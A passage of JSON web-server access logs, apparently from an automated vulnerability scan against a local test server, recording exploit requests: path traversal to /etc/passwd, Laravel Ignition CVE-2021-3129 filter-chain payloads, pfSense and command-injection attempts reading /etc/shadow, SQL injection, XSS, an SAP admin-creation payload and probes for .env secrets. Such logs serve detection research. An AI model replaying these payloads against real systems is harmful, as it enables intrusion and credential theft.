Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MyErrors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /build.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:09 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?pretty HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /diag_routes.php?isAjax=1&filter=.*/!d;};s/Destination/\x5Cx3c\x5Cx3fphp+var_dump(md5(\x5Cx27CVE-2021-41282\x5Cx27));unlink(__FILE__)\x5Cx3b\x5Cx3f\x5Cx3e/;w+/usr/local/www/test.php%0a%23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.development.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"more=0&host=0&username=admin&password=admin&db=&lang=en_us&expire=3","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?action=login.index HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"127.0.0.1/index.php?action=login.index", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/weekender/friend.php?id=MTA0&link=aHR0cHM6Ly9leGFtcGxlLmNvbQ== HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.005","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22AA\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /setup.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_cat/indices?v HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.esmtprc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /test.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.prod HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/contentfinder/connector/suggestions.json;%0aOJh.css?query_term=path%3a/&pre=29KBxf8XKfd6T2esJRdYzW9066l HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=4C=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=6F=00=69=00=61=00=57=00=51=00=69=00=4F=00=33=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=63=00=4A=00=39=00=59=00=36=00=5A=00=6B=00=50=00=61=00=39=00=61=00=45=00=49=00=51=00=49=00=45=00=47=00=30=00=6B=00=4A=00=2B=00=39=00=4A=00=50=00=6B=00=4C=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /run.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_all/_search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/user/picker?query= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/deviceInfo?auth=YWRtaW46MTEK HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.prod.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Account/LogIn?returnUrl=%2F&hasAttemptedCookie=True HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/contact-form-7/readme.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"action=setup_wizard_cancel&html_response_page=ftpserver.asp&html_response_return_page=ftpserver.asp","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backup.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.axiom/accounts/do.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"sap.com/tc~lm~config~contentcontent/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc\x0D\x0A CiAgICAgICAgICAgIDxQQ0s+CiAgICAgICAgICAgIDxVc2VybWFuYWdlbWVudD4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT05GSUc+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+QWRtaW5pc3RyYXRvcjwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0NPTkZJRz4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgICAgPHJvbGVOYW1lPlRoaXNJc1JuZDczODA8L3JvbGVOYW1lPgogICAgICAgICAgICAgIDwvU0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgIDxTQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgPFNBUF9YSV9QQ0tfQURNSU4+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0FETUlOPgogICAgICAgICAgICAgIDxQQ0tVc2VyPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lIHNlY3VyZT0idHJ1ZSI+c2FwUnBvYzYzNTE8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+U2VjdXJlIVB3RDg4OTA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLVXNlcj4KICAgICAgICAgICAgICA8UENLUmVjZWl2ZXI+CiAgICAgICAgICAgICAgICA8dXNlck5hbWU+VGhpc0lzUm5kNzM4MDwvdXNlck5hbWU+CiAgICAgICAgICAgICAgICA8cGFzc3dvcmQgc2VjdXJlPSJ0cnVlIj5UaGlzSXNSbmQ3MzgwPC9wYXNzd29yZD4KICAgICAgICAgICAgICA8L1BDS1JlY2VpdmVyPgogICAgICAgICAgICAgIDxQQ0tNb25pdG9yPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lPlRoaXNJc1JuZDczODA8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+VGhpc0lzUm5kNzM4MDwvcGFzc3dvcmQ+CiAgICAgICAgICAgICAgPC9QQ0tNb25pdG9yPgogICAgICAgICAgICAgIDxQQ0tBZG1pbj4KICAgICAgICAgICAgICAgIDx1c2VyTmFtZT5UaGlzSXNSbmQ3MzgwPC91c2VyTmFtZT4KICAgICAgICAgICAgICAgIDxwYXNzd29yZCBzZWN1cmU9InRydWUiPlRoaXNJc1JuZDczODA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLQWRtaW4+CiAgICAgICAgICAgIDwvVXNlcm1hbmFnZW1lbnQ+CiAgICAgICAgICA8L1BDSz4KICAgIA==\x0D\x0AuserDetails","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application/logs/application.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.production 